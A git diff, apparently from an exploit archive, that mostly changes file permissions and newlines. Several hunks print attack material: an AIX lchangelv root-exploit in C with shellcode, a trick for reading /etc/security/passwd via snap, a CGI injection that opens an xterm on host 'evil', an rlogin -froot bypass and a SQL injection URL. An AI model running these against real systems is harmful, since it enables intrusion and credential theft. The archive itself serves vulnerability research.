a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. -snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command. \ No newline at end of file +snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command. \ No newline at end of file diff --git a/platforms/aix/local/19306.c b/platforms/aix/local/19306.c old mode 100755 new mode 100644 index fddbe1c8d..04c041277 --- a/platforms/aix/local/19306.c +++ b/platforms/aix/local/19306.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/385/info AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information. +*/ /*## copyright LAST STAGE OF DELIRIUM oct 2000 poland *://lsd-pl.net/ #*/ /*## /usr/bin/portmir #*/ diff --git a/platforms/aix/local/19307.c b/platforms/aix/local/19307.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/19309.c b/platforms/aix/local/19309.c old mode 100755 new mode 100644 index a7c22c4f2..862436da1 --- a/platforms/aix/local/19309.c +++ b/platforms/aix/local/19309.c @@ -1,102 +1,101 @@ +/* source: http://www.securityfocus.com/bid/389/info - A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv. Because lchangelv is SUID root, this overflow will grant the attacker root privileges. +*/ - /* - * - * /usr/sbin/lchangelv (kinda' coded) by BeastMaster V - * - * CREDITS: this is simply a modified version of an exploit - * posted by Georgi Guninski (guninski@hotmail.com) - * - * NOTES: you must have gid or egid of (system) to run this. - * - * USAGE: - * $ cc -o foo -g aix_lchangelv.c - * $ ./foo 5100 - * # - * - * - * HINT: Try giving ranges from 5090 through 5500 - * - * DISCLAIMER: use this program in a responsible manner. - * - */ +/* + * + * /usr/sbin/lchangelv (kinda' coded) by BeastMaster V + * + * CREDITS: this is simply a modified version of an exploit + * posted by Georgi Guninski (guninski@hotmail.com) + * + * NOTES: you must have gid or egid of (system) to run this. + * + * USAGE: + * $ cc -o foo -g aix_lchangelv.c + * $ ./foo 5100 + * # + * + * + * HINT: Try giving ranges from 5090 through 5500 + * + * DISCLAIMER: use this program in a responsible manner. + * + */ - #include - #include - #include - #include +#include +#include +#include +#include - extern int execv(); +extern int execv(); - #define MAXBUF 600 +#define MAXBUF 600 - unsigned int code[]={ - 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , - 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , - 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , - 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , - 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , - 0x7c0903a6 , 0x4e800420, 0x0 - }; +unsigned int code[]={ + 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , + 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , + 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , + 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , + 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , + 0x7c0903a6 , 0x4e800420, 0x0 +}; - char *createvar(char *name,char *value) - { - char *c; - int l; +char *createvar(char *name,char *value) +{ + char *c; + int l; - l=strlen(name)+strlen(value)+4; - if (! (c=malloc(l))) {perror("error allocating");exit(2);}; - strcpy(c,name); - strcat(c,"="); - strcat(c,value); - putenv(c); - return c; - } + l=strlen(name)+strlen(value)+4; + if (! (c=malloc(l))) {perror("error allocating");exit(2);}; + strcpy(c,name); + strcat(c,"="); + strcat(c,value); + putenv(c); + return c; +} - main(int argc,char **argv,char **env) - { - unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; - int min=100, max=280; - unsigned int return_address; - char *newenv[8]; - char *args[4]; - int offset=3200; +main(int argc,char **argv,char **env) +{ + unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; + int min=100, max=280; + unsigned int return_address; + char *newenv[8]; + char *args[4]; + int offset=3200; - if (argc==2) offset = atoi(argv[1]); + if (argc==2) offset = atoi(argv[1]); - pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; + pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; - *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); - *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f -fff); - *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); - *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000 -ffff); + *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); + *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff); + *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); + *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff); - return_address=(unsigned)&buf[0]+offset; + return_address=(unsigned)&buf[0]+offset; - for(nop=0;nop /tmp/log. $$ grep test /tmp/log. -$$ rm /tmp/log. $$ \ No newline at end of file +$$ rm /tmp/log. $$ \ No newline at end of file diff --git a/platforms/aix/local/30399.c b/platforms/aix/local/30399.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/333.c b/platforms/aix/local/333.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/335.c b/platforms/aix/local/335.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/33725.txt b/platforms/aix/local/33725.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/local/38106.txt b/platforms/aix/local/38106.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/local/4231.c b/platforms/aix/local/4231.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/4233.c b/platforms/aix/local/4233.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/699.c b/platforms/aix/local/699.c old mode 100755 new mode 100644 diff --git a/platforms/aix/local/9306.txt b/platforms/aix/local/9306.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/remote/14407.c b/platforms/aix/remote/14407.c old mode 100755 new mode 100644 diff --git a/platforms/aix/remote/14456.c b/platforms/aix/remote/14456.c old mode 100755 new mode 100644 diff --git a/platforms/aix/remote/19047.txt b/platforms/aix/remote/19047.txt old mode 100755 new mode 100644 index 3007e846f..2c210a87d --- a/platforms/aix/remote/19047.txt +++ b/platforms/aix/remote/19047.txt @@ -13,4 +13,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx -[dead] \ No newline at end of file +[dead] \ No newline at end of file diff --git a/platforms/aix/remote/19048.txt b/platforms/aix/remote/19048.txt old mode 100755 new mode 100644 index 5a7ada91f..939a41ae9 --- a/platforms/aix/remote/19048.txt +++ b/platforms/aix/remote/19048.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/64/info There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018. -$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|' \ No newline at end of file +$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|' \ No newline at end of file diff --git a/platforms/aix/remote/19237.txt b/platforms/aix/remote/19237.txt old mode 100755 new mode 100644 index 8ce62b7f6..f9eda09f7 --- a/platforms/aix/remote/19237.txt +++ b/platforms/aix/remote/19237.txt @@ -4,4 +4,4 @@ NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsol Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay. -Specify <> in the 'Mail From' field. \ No newline at end of file +Specify <> in the 'Mail From' field. \ No newline at end of file diff --git a/platforms/aix/remote/19348.txt b/platforms/aix/remote/19348.txt old mode 100755 new mode 100644 index 3b4f0cf43..ad86c8129 --- a/platforms/aix/remote/19348.txt +++ b/platforms/aix/remote/19348.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/458/info A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. -%rlogin -froot targethost.com \ No newline at end of file +%rlogin -froot targethost.com \ No newline at end of file diff --git a/platforms/aix/remote/21093.c b/platforms/aix/remote/21093.c old mode 100755 new mode 100644 diff --git a/platforms/aix/shellcode/13241.txt b/platforms/aix/shellcode/13241.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/10372.txt b/platforms/aix/webapps/10372.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/11580.txt b/platforms/aix/webapps/11580.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/14058.html b/platforms/aix/webapps/14058.html old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/21319.txt b/platforms/aix/webapps/21319.txt old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/33736.php b/platforms/aix/webapps/33736.php old mode 100755 new mode 100644 diff --git a/platforms/aix/webapps/41546.txt b/platforms/aix/webapps/41546.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/18630.txt b/platforms/android/dos/18630.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/23248.txt b/platforms/android/dos/23248.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/28957.txt b/platforms/android/dos/28957.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/31308.html b/platforms/android/dos/31308.html old mode 100755 new mode 100644 diff --git a/platforms/android/dos/35382.txt b/platforms/android/dos/35382.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/35913.txt b/platforms/android/dos/35913.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38555.txt b/platforms/android/dos/38555.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38556.txt b/platforms/android/dos/38556.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38557.txt b/platforms/android/dos/38557.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38558.txt b/platforms/android/dos/38558.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38610.txt b/platforms/android/dos/38610.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38611.txt b/platforms/android/dos/38611.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38612.txt b/platforms/android/dos/38612.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38613.txt b/platforms/android/dos/38613.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/38614.txt b/platforms/android/dos/38614.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39424.txt b/platforms/android/dos/39424.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39425.txt b/platforms/android/dos/39425.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39504.c b/platforms/android/dos/39504.c old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39629.txt b/platforms/android/dos/39629.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39651.txt b/platforms/android/dos/39651.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39685.txt b/platforms/android/dos/39685.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39686.txt b/platforms/android/dos/39686.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39801.c b/platforms/android/dos/39801.c old mode 100755 new mode 100644 diff --git a/platforms/android/dos/39921.txt b/platforms/android/dos/39921.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40381.txt b/platforms/android/dos/40381.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40449.txt b/platforms/android/dos/40449.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40502.txt b/platforms/android/dos/40502.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40515.txt b/platforms/android/dos/40515.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40876.txt b/platforms/android/dos/40876.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40913.java b/platforms/android/dos/40913.java old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40914.java b/platforms/android/dos/40914.java old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40945.txt b/platforms/android/dos/40945.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/40993.txt b/platforms/android/dos/40993.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41161.txt b/platforms/android/dos/41161.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41211.txt b/platforms/android/dos/41211.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41212.txt b/platforms/android/dos/41212.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41218.txt b/platforms/android/dos/41218.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41232.txt b/platforms/android/dos/41232.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41351.txt b/platforms/android/dos/41351.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41352.txt b/platforms/android/dos/41352.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41353.txt b/platforms/android/dos/41353.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41354.txt b/platforms/android/dos/41354.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41355.txt b/platforms/android/dos/41355.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41981.txt b/platforms/android/dos/41981.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41982.txt b/platforms/android/dos/41982.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/41983.txt b/platforms/android/dos/41983.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/42135.c b/platforms/android/dos/42135.c old mode 100755 new mode 100644 diff --git a/platforms/android/dos/42169.txt b/platforms/android/dos/42169.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/42170.txt b/platforms/android/dos/42170.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/42171.txt b/platforms/android/dos/42171.txt old mode 100755 new mode 100644 diff --git a/platforms/android/dos/42285.txt b/platforms/android/dos/42285.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/16098.c b/platforms/android/local/16098.c old mode 100755 new mode 100644 diff --git a/platforms/android/local/16099.c b/platforms/android/local/16099.c old mode 100755 new mode 100644 diff --git a/platforms/android/local/32884.txt b/platforms/android/local/32884.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/35711.c b/platforms/android/local/35711.c old mode 100755 new mode 100644 diff --git a/platforms/android/local/39061.txt b/platforms/android/local/39061.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/39340.cpp b/platforms/android/local/39340.cpp old mode 100755 new mode 100644 diff --git a/platforms/android/local/39757.txt b/platforms/android/local/39757.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/40066.txt b/platforms/android/local/40066.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/41130.txt b/platforms/android/local/41130.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/41217.txt b/platforms/android/local/41217.txt old mode 100755 new mode 100644 diff --git a/platforms/android/local/42601.txt b/platforms/android/local/42601.txt old mode 100755 new mode 100644 index 0e571636f..a721c4404 --- a/platforms/android/local/42601.txt +++ b/platforms/android/local/42601.txt @@ -28,4 +28,4 @@ cedric:/ # Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip \ No newline at end of file diff --git a/platforms/android/local/9477.txt b/platforms/android/local/9477.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/15423.html b/platforms/android/remote/15423.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/15548.html b/platforms/android/remote/15548.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/16974.html b/platforms/android/remote/16974.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/18446.html b/platforms/android/remote/18446.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/34088.html b/platforms/android/remote/34088.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/37792.txt b/platforms/android/remote/37792.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/37793.txt b/platforms/android/remote/37793.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/37794.txt b/platforms/android/remote/37794.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/37795.txt b/platforms/android/remote/37795.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/38170.txt b/platforms/android/remote/38170.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/38310.c b/platforms/android/remote/38310.c old mode 100755 new mode 100644 diff --git a/platforms/android/remote/38586.txt b/platforms/android/remote/38586.txt old mode 100755 new mode 100644 index 6a5235e2b..58327ea7b --- a/platforms/android/remote/38586.txt +++ b/platforms/android/remote/38586.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected. - \ No newline at end of file + \ No newline at end of file diff --git a/platforms/android/remote/39640.txt b/platforms/android/remote/39640.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/40354.txt b/platforms/android/remote/40354.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/40846.html b/platforms/android/remote/40846.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/40874.txt b/platforms/android/remote/40874.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42175.html b/platforms/android/remote/42175.html old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42287.txt b/platforms/android/remote/42287.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42288.txt b/platforms/android/remote/42288.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42289.txt b/platforms/android/remote/42289.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42349.txt b/platforms/android/remote/42349.txt old mode 100755 new mode 100644 diff --git a/platforms/android/remote/42350.txt b/platforms/android/remote/42350.txt old mode 100755 new mode 100644 diff --git a/platforms/android/shellcode/38194.c b/platforms/android/shellcode/38194.c old mode 100755 new mode 100644 index dd7c34f30..038de705b --- a/platforms/android/shellcode/38194.c +++ b/platforms/android/shellcode/38194.c @@ -241,4 +241,4 @@ int main(void) { (*(void(*) ()) SC) (); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/android/webapps/18164.php b/platforms/android/webapps/18164.php old mode 100755 new mode 100644 diff --git a/platforms/arm/dos/40182.txt b/platforms/arm/dos/40182.txt old mode 100755 new mode 100644 diff --git a/platforms/arm/local/31574.c b/platforms/arm/local/31574.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14097.c b/platforms/arm/shellcode/14097.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14113.txt b/platforms/arm/shellcode/14113.txt old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14116.txt b/platforms/arm/shellcode/14116.txt old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14122.txt b/platforms/arm/shellcode/14122.txt old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14139.c b/platforms/arm/shellcode/14139.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14142.c b/platforms/arm/shellcode/14142.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14190.c b/platforms/arm/shellcode/14190.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/14907.c b/platforms/arm/shellcode/14907.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/15314.asm b/platforms/arm/shellcode/15314.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/15315.asm b/platforms/arm/shellcode/15315.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/15316.asm b/platforms/arm/shellcode/15316.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/15317.asm b/platforms/arm/shellcode/15317.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/15616.c b/platforms/arm/shellcode/15616.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/21252.asm b/platforms/arm/shellcode/21252.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/21253.asm b/platforms/arm/shellcode/21253.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/21254.asm b/platforms/arm/shellcode/21254.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/27180.asm b/platforms/arm/shellcode/27180.asm old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/39496.c b/platforms/arm/shellcode/39496.c old mode 100755 new mode 100644 diff --git a/platforms/arm/shellcode/42646.c b/platforms/arm/shellcode/42646.c old mode 100755 new mode 100644 index 58d690e24..ae1a33c2a --- a/platforms/arm/shellcode/42646.c +++ b/platforms/arm/shellcode/42646.c @@ -86,4 +86,4 @@ int main(void) { return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/42647.c b/platforms/arm/shellcode/42647.c old mode 100755 new mode 100644 index 06bb38aeb..fc48d5563 --- a/platforms/arm/shellcode/42647.c +++ b/platforms/arm/shellcode/42647.c @@ -68,4 +68,4 @@ char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x0 int main(void) { (*(void(*)()) code)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/ashx/webapps/39497.txt b/platforms/ashx/webapps/39497.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/dos/12527.txt b/platforms/asp/dos/12527.txt old mode 100755 new mode 100644 index 3b1d4e7bc..683fd0529 --- a/platforms/asp/dos/12527.txt +++ b/platforms/asp/dos/12527.txt @@ -46,4 +46,4 @@ ************************************************************ -************************************************************ \ No newline at end of file +************************************************************ \ No newline at end of file diff --git a/platforms/asp/dos/25962.xml b/platforms/asp/dos/25962.xml old mode 100755 new mode 100644 index b28741bfb..db1366944 --- a/platforms/asp/dos/25962.xml +++ b/platforms/asp/dos/25962.xml @@ -23,4 +23,4 @@ soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 0 - \ No newline at end of file + \ No newline at end of file diff --git a/platforms/asp/dos/27258.txt b/platforms/asp/dos/27258.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/dos/35154.txt b/platforms/asp/dos/35154.txt old mode 100755 new mode 100644 index c1a1cd77b..d579dad4a --- a/platforms/asp/dos/35154.txt +++ b/platforms/asp/dos/35154.txt @@ -4,4 +4,4 @@ Sigma Portal is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users. -http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID) \ No newline at end of file +http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID) \ No newline at end of file diff --git a/platforms/asp/remote/27861.txt b/platforms/asp/remote/27861.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/remote/27862.txt b/platforms/asp/remote/27862.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1011.php b/platforms/asp/webapps/1011.php old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1012.txt b/platforms/asp/webapps/1012.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1015.txt b/platforms/asp/webapps/1015.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10161.txt b/platforms/asp/webapps/10161.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10166.txt b/platforms/asp/webapps/10166.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10167.txt b/platforms/asp/webapps/10167.txt old mode 100755 new mode 100644 index b4224cc62..2dbc332d2 --- a/platforms/asp/webapps/10167.txt +++ b/platforms/asp/webapps/10167.txt @@ -23,4 +23,4 @@ http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1 Greetz : WwW.IQ-ty.CoM -| CraCkEr | Cyber-Zone | str0ke | jiko \ No newline at end of file +| CraCkEr | Cyber-Zone | str0ke | jiko \ No newline at end of file diff --git a/platforms/asp/webapps/10253.txt b/platforms/asp/webapps/10253.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10254.txt b/platforms/asp/webapps/10254.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10368.txt b/platforms/asp/webapps/10368.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10425.txt b/platforms/asp/webapps/10425.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10449.txt b/platforms/asp/webapps/10449.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10455.txt b/platforms/asp/webapps/10455.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10456.txt b/platforms/asp/webapps/10456.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10457.txt b/platforms/asp/webapps/10457.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10464.txt b/platforms/asp/webapps/10464.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10465.txt b/platforms/asp/webapps/10465.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10470.txt b/platforms/asp/webapps/10470.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10473.txt b/platforms/asp/webapps/10473.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10476.txt b/platforms/asp/webapps/10476.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10482.txt b/platforms/asp/webapps/10482.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10483.txt b/platforms/asp/webapps/10483.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10496.txt b/platforms/asp/webapps/10496.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10501.txt b/platforms/asp/webapps/10501.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10502.txt b/platforms/asp/webapps/10502.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10503.txt b/platforms/asp/webapps/10503.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10504.txt b/platforms/asp/webapps/10504.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10505.txt b/platforms/asp/webapps/10505.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10507.txt b/platforms/asp/webapps/10507.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10520.txt b/platforms/asp/webapps/10520.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10525.txt b/platforms/asp/webapps/10525.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10526.txt b/platforms/asp/webapps/10526.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10529.txt b/platforms/asp/webapps/10529.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10540.txt b/platforms/asp/webapps/10540.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10558.txt b/platforms/asp/webapps/10558.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10573.txt b/platforms/asp/webapps/10573.txt old mode 100755 new mode 100644 index c7cd7da6a..5eb4d5d7a --- a/platforms/asp/webapps/10573.txt +++ b/platforms/asp/webapps/10573.txt @@ -66,4 +66,4 @@ Thanks You: eXceptioN,CodeInside -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10576.txt b/platforms/asp/webapps/10576.txt old mode 100755 new mode 100644 index f17ea3460..5bb3327b1 --- a/platforms/asp/webapps/10576.txt +++ b/platforms/asp/webapps/10576.txt @@ -67,4 +67,4 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10582.txt b/platforms/asp/webapps/10582.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10637.txt b/platforms/asp/webapps/10637.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10638.txt b/platforms/asp/webapps/10638.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10639.txt b/platforms/asp/webapps/10639.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10686.txt b/platforms/asp/webapps/10686.txt old mode 100755 new mode 100644 index 92d46f9d8..3e1b40f34 --- a/platforms/asp/webapps/10686.txt +++ 